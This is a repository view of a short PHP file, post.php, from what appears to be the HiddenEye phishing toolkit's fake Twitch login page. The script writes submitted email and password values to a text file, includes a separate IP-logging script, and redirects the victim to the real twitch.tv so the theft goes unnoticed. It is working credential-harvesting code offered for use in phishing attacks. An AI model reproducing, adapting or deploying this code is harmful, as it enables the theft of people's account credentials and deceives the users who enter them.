HiddenEye-Legacy/WebPages/twitch/post.php
Usama Abdul Sattar 0bbf030f22
Update post.php
2018-06-08 17:00:05 +05:00

7 lines
203 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/');
exit();